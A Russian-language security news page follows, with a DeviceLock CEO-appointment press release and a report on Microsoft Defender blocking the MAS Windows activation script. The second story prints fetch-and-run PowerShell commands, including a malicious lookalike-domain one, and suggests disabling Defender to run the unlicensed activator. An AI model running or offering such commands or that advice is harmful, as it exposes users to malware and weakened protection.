Скиаво из силиконовой долины назначен генеральным директором Devicelock

Скиаво из силиконовой долины назначен генеральным директором Devicelock

Компания Смарт Лайн Инк, анонсировала назначение Винсента Скиаво (Vincent M. Schiavo) на должность генерального директора DeviceLock, Inc., головной компании холдинга. В этой ответственной роли г-н Скиаво, базирующийся в офисе DeviceLock в Сан Рамоне (США), сфокусируется на глобальной экспансии DLP-решений компании – прежде всего, на американский рынок, а также эффективной реализации стратегии ее международного развития.

Ветеран американской отрасли программных средств информационной безопасности с 30-летним опытом работы и уникальными связями в среде производителей и потребителей средств защиты информации, а также венчурных инвесторов, до DeviceLock г-н Скиаво работал в должности исполнительного вице-президента по продажам (Executive VP of Worldwide Sales) американской компании LogLogic, одного из лидеров рынка систем управления информацией о безопасности и событиях (SIEM).

Ранее г-н Скиаво более шести лет был старшим вице-президентом по международным продажам и маркетингу (Senior VP of Worldwide Sales and Marketing) известного американского производителя средств защиты информации Secure Computing, приобретенного в 2008 году McAfee. Во время своей многолетней работы в Secure Computing г-н Скиаво создал глобальное подразделение продаж, которое увеличило ежегодные объемы продаж компании с 36 до 300 млн.долларов.

«Винсент привносит в руководство компанией столь необходимую для ее прогрессивного развития широту бизнес-перспектив в сочетании с глубокой технологической экспертизой, – отметил Ашот Оганесян, основатель и технический директор Смарт Лайн. – Мы убеждены, что использование уникального опыта г-на Скиаво позволит нашей компании принципиально расширить диапазон и результативность международной деятельности DeviceLock».

«Широкое использование в корпоративных ИС принадлежащих сотрудникам персональных мобильных устройств – таких, как смартфоны, цифровые камеры, планшетные компьютеры iPad – а также съемных USB-носителей на порядки увеличило риски утечки и кражи ценных данных с рабочих компьютеров предприятий и организаций, – отметил Винсент Скиаво, генеральный директор DeviceLock. – Комплекс DeviceLock позиционируются как наиболее эффективное DLP-решение защиты корпоративных компьютеров от утечек данных а также интегральный компонент полнофункциональных систем обеспечения ИБ в организациях любых размеров и отраслей. Основным фактором прогрессивного развития нашей компании будет ее приверженность технологическому лидерству в этом ключевом сегменте индустрии информационной безопасности».

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru